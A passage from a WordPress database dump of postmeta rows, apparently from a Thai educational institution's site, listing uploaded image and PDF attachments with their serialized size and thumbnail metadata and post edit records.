\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26047, 10577, '_wp_attached_file', '2020/10/021063-22.jpg'),
(26048, 10577, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-22.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-22-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-22-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-22-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-22-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-22-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26049, 10578, '_wp_attached_file', '2020/10/021063-17.jpg'),
(26050, 10578, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-17.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-17-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-17-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-17-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-17-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-17-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26051, 10579, '_wp_attached_file', '2020/10/021063-14.jpg'),
(26052, 10579, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-14.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-14-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-14-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-14-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-14-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-14-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26053, 10580, '_wp_attached_file', '2020/10/021063-12.jpg'),
(26054, 10580, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-12.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-12-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-12-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-12-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-12-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-12-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26055, 10581, '_wp_attached_file', '2020/10/021063-01.jpg'),
(26056, 10581, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/021063-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"021063-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"021063-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"021063-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"021063-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"021063-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26057, 10548, '_thumbnail_id', '10581'),
(26060, 10548, '_hide_featured', NULL),
(26063, 10583, '_edit_lock', '1601864440:14'),
(26064, 10583, '_edit_last', '14'),
(26065, 10583, '_thumbnail_id', '10575'),
(26068, 10583, '_hide_featured', NULL),
(26071, 10585, '_edit_lock', '1601864334:14'),
(26072, 10585, '_edit_last', '14'),
(26073, 10585, '_thumbnail_id', '10574'),
(26076, 10585, '_hide_featured', NULL);
INSERT INTO `wp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(26079, 10587, '_edit_lock', '1601864388:14'),
(26080, 10587, '_edit_last', '14'),
(26081, 10587, '_thumbnail_id', '10573'),
(26084, 10587, '_hide_featured', NULL),
(26087, 10589, '_edit_lock', '1601864443:14'),
(26088, 10589, '_edit_last', '14'),
(26089, 10589, '_thumbnail_id', '10572'),
(26092, 10589, '_hide_featured', NULL),
(26095, 10591, '_edit_lock', '1601864495:14'),
(26096, 10591, '_edit_last', '14'),
(26097, 10591, '_thumbnail_id', '10571'),
(26100, 10591, '_hide_featured', NULL),
(26103, 10593, '_edit_lock', '1601864525:14'),
(26104, 10593, '_edit_last', '14'),
(26105, 10593, '_thumbnail_id', '10570'),
(26108, 10593, '_hide_featured', NULL),
(26111, 10595, '_edit_lock', '1601864567:14'),
(26112, 10595, '_edit_last', '14'),
(26113, 10595, '_thumbnail_id', '10569'),
(26116, 10595, '_hide_featured', NULL),
(26119, 10597, '_edit_lock', '1601864745:14'),
(26120, 10597, '_edit_last', '14'),
(26121, 10597, '_thumbnail_id', '10568'),
(26124, 10597, '_hide_featured', NULL),
(26129, 10599, '_edit_lock', '1601864669:14'),
(26130, 10599, '_edit_last', '14'),
(26131, 10599, '_thumbnail_id', '10567'),
(26134, 10599, '_hide_featured', NULL),
(26139, 10601, '_edit_lock', '1601864738:14'),
(26140, 10601, '_edit_last', '14'),
(26141, 10601, '_thumbnail_id', '10566'),
(26144, 10601, '_hide_featured', NULL),
(26147, 10603, '_edit_lock', '1601864781:14'),
(26148, 10603, '_edit_last', '14'),
(26149, 10603, '_thumbnail_id', '10580'),
(26152, 10603, '_hide_featured', NULL),
(26155, 10605, '_edit_lock', '1601864860:14'),
(26156, 10605, '_edit_last', '14'),
(26157, 10605, '_thumbnail_id', '10565'),
(26160, 10605, '_hide_featured', NULL),
(26165, 10607, '_edit_lock', '1601865143:14'),
(26166, 10607, '_edit_last', '14'),
(26167, 10607, '_thumbnail_id', '10579'),
(26170, 10607, '_hide_featured', NULL),
(26175, 10609, '_edit_lock', '1601870572:14'),
(26176, 10609, '_edit_last', '14'),
(26177, 10609, '_thumbnail_id', '10564'),
(26180, 10609, '_hide_featured', NULL),
(26189, 10611, '_edit_lock', '1601870727:14'),
(26190, 10611, '_edit_last', '14'),
(26191, 10611, '_thumbnail_id', '10578'),
(26194, 10611, '_hide_featured', NULL),
(26197, 10613, '_edit_lock', '1601886653:14'),
(26198, 10613, '_edit_last', '14'),
(26199, 10613, '_thumbnail_id', '10563'),
(26202, 10613, '_hide_featured', NULL),
(26205, 10615, '_edit_lock', '1601980417:14'),
(26206, 10615, '_edit_last', '14'),
(26207, 10616, '_wp_attached_file', '2020/10/20201006085422268.pdf'),
(26210, 10615, '_hide_featured', NULL),
(26213, 10618, '_edit_lock', '1601982315:14'),
(26214, 10619, '_wp_attached_file', '2020/10/20201006085434737.pdf'),
(26215, 10618, '_edit_last', '14'),
(26218, 10618, '_hide_featured', NULL),
(26223, 10621, '_edit_lock', '1602045976:14'),
(26224, 10621, '_edit_last', '14'),
(26225, 10622, '_wp_attached_file', '2020/10/021063-19-1.jpg'),
(26226, 10622, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:23:\"2020/10/021063-19-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:23:\"021063-19-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:23:\"021063-19-1-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:23:\"021063-19-1-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:24:\"021063-19-1-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:23:\"021063-19-1-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26227, 10621, '_thumbnail_id', '10562'),
(26230, 10621, '_hide_featured', NULL),
(26235, 10624, '_edit_lock', '1602046144:14'),
(26236, 10624, '_edit_last', '14'),
(26237, 10624, '_thumbnail_id', '10561'),
(26240, 10624, '_hide_featured', NULL),
(26245, 10626, '_edit_lock', '1602046223:14'),
(26246, 10626, '_edit_last', '14'),
(26247, 10626, '_thumbnail_id', '10560'),
(26250, 10626, '_hide_featured', NULL),
(26255, 10628, '_edit_lock', '1602046429:14'),
(26256, 10628, '_edit_last', '14'),
(26257, 10628, '_thumbnail_id', '10577'),
(26260, 10628, '_hide_featured', NULL),
(26265, 10630, '_edit_lock', '1602046342:14'),
(26266, 10630, '_edit_last', '14'),
(26267, 10630, '_thumbnail_id', '10559'),
(26270, 10630, '_hide_featured', NULL),
(26273, 10632, '_edit_lock', '1602046415:14'),
(26274, 10632, '_edit_last', '14'),
(26277, 10632, '_hide_featured', NULL),
(26278, 10632, '_thumbnail_id', '10558'),
(26285, 10634, '_edit_lock', '1602046461:14'),
(26286, 10634, '_edit_last', '14'),
(26287, 10634, '_thumbnail_id', '10557'),
(26290, 10634, '_hide_featured', NULL),
(26295, 10636, '_edit_lock', '1602046549:14'),
(26296, 10636, '_edit_last', '14'),
(26297, 10636, '_thumbnail_id', '10576'),
(26300, 10636, '_hide_featured', NULL),
(26305, 10638, '_edit_lock', '1602046871:14'),
(26306, 10638, '_edit_last', '14'),
(26307, 10638, '_thumbnail_id', '10556'),
(26310, 10638, '_hide_featured', NULL),
(26317, 10640, '_edit_lock', '1602046855:14'),
(26318, 10640, '_edit_last', '14'),
(26319, 10640, '_thumbnail_id', '10555'),
(26322, 10640, '_hide_featured', NULL),
(26325, 10643, '_edit_lock', '1602047111:14'),
(26326, 10643, '_edit_last', '14'),
(26327, 10643, '_thumbnail_id', '10554'),
(26330, 10643, '_hide_featured', NULL),
(26333, 10645, '_edit_lock', '1602047150:14'),
(26334, 10645, '_edit_last', '14'),
(26335, 10645, '_thumbnail_id', '10553'),
(26338, 10645, '_hide_featured', NULL),
(26341, 10647, '_edit_lock', '1602047203:14'),
(26342, 10647, '_edit_last', '14'),
(26343, 10647, '_thumbnail_id', '10552'),
(26346, 10647, '_hide_featured', NULL),
(26351, 10650, '_edit_lock', '1602047264:14'),
(26352, 10650, '_edit_last', '14'),
(26353, 10650, '_thumbnail_id', '10551'),
(26356, 10650, '_hide_featured', NULL),
(26361, 10652, '_edit_lock', '1602047317:14'),
(26362, 10652, '_edit_last', '14'),
(26363, 10652, '_thumbnail_id', '10550'),
(26366, 10652, '_hide_featured', NULL),
(26371, 10654, '_edit_lock', '1602047658:14'),
(26372, 10654, '_edit_last', '14'),
(26373, 10654, '_thumbnail_id', '10549'),
(26376, 10654, '_hide_featured', NULL),
(26379, 10656, '_edit_lock', '1602047709:14'),
(26380, 10656, '_edit_last', '14'),
(26381, 10657, '_wp_attached_file', '2020/10/071063-01.jpg'),
(26382, 10657, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/071063-01.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"071063-01-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"071063-01-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"071063-01-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"071063-01-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"071063-01-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26383, 10656, '_thumbnail_id', '10657'),
(26386, 10656, '_hide_featured', NULL),
(26389, 10659, '_edit_lock', '1602047752:14'),
(26390, 10659, '_edit_last', '14'),
(26391, 10660, '_wp_attached_file', '2020/10/071063-02.jpg'),
(26392, 10660, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/071063-02.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"071063-02-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"071063-02-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"071063-02-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"071063-02-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"071063-02-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26393, 10659, '_thumbnail_id', '10660'),
(26396, 10659, '_hide_featured', NULL),
(26399, 10664, '_edit_lock', '1602508178:14'),
(26400, 10664, '_edit_last', '14'),
(26401, 10665, '_wp_attached_file', '2020/10/รับสมัครช่างไฟฟ้า.pdf'),
(26404, 10664, '_hide_featured', NULL),
(26407, 10668, '_edit_lock', '1602508013:14'),
(26408, 10668, '_edit_last', '14'),
(26409, 10669, '_wp_attached_file', '2020/10/รับสมัครคนงาน.pdf'),
(26412, 10668, '_hide_featured', NULL),
(26419, 10673, '_edit_lock', '1602816591:14'),
(26420, 10673, '_edit_last', '14'),
(26421, 10674, '_wp_attached_file', '2020/10/ประกาศ-จนท.ทะเบียน.pdf'),
(26424, 10673, '_hide_featured', NULL),
(26431, 10676, '_edit_lock', '1603100091:14'),
(26432, 10676, '_edit_last', '14'),
(26433, 10677, '_wp_attached_file', '2020/10/20201019111242946.pdf'),
(26436, 10676, '_hide_featured', NULL),
(26439, 10680, '_edit_lock', '1604300051:14'),
(26440, 10680, '_edit_last', '14'),
(26441, 10681, '_wp_attached_file', '2020/10/กำหนดลงทะเบียนเรียน2-63.pdf'),
(26444, 10680, '_hide_featured', NULL),
(26453, 10684, '_wp_attached_file', '2019/12/การลงทะเบียนเรียนประจำภาคเรียนที่-๒-๒๕๖๓.png'),
(26454, 10684, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1200;s:6:\"height\";i:210;s:4:\"file\";s:128:\"2019/12/การลงทะเบียนเรียนประจำภาคเรียนที่-๒-๒๕๖๓.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:128:\"การลงทะเบียนเรียนประจำภาคเรียนที่-๒-๒๕๖๓-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:127:\"การลงทะเบียนเรียนประจำภาคเรียนที่-๒-๒๕๖๓-300x53.png\";s:5:\"width\";i:300;s:6:\"height\";i:53;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:128:\"การลงทะเบียนเรียนประจำภาคเรียนที่-๒-๒๕๖๓-768x134.png\";s:5:\"width\";i:768;s:6:\"height\";i:134;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:129:\"การลงทะเบียนเรียนประจำภาคเรียนที่-๒-๒๕๖๓-1024x179.png\";s:5:\"width\";i:1024;s:6:\"height\";i:179;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:127:\"การลงทะเบียนเรียนประจำภาคเรียนที่-๒-๒๕๖๓-400x70.png\";s:5:\"width\";i:400;s:6:\"height\";i:70;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26455, 10689, '_edit_lock', '1603333745:14'),
(26456, 10689, '_edit_last', '14'),
(26457, 10690, '_wp_attached_file', '2020/10/221063-06.jpg'),
(26458, 10690, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/221063-06.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"221063-06-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"221063-06-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"221063-06-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"221063-06-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"221063-06-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26459, 10691, '_wp_attached_file', '2020/10/221063-05.jpg'),
(26460, 10691, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/221063-05.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"221063-05-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"221063-05-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"221063-05-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"221063-05-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"221063-05-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(26461, 10692, '_wp_attached_file', '2020/10/221063-04.jpg'),
(26462, 10692, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:21:\"2020/10/221063-04.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"221063-04-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"221063-04-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:21:\"221063-04-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:22:\"221063-04-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"221063-04-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
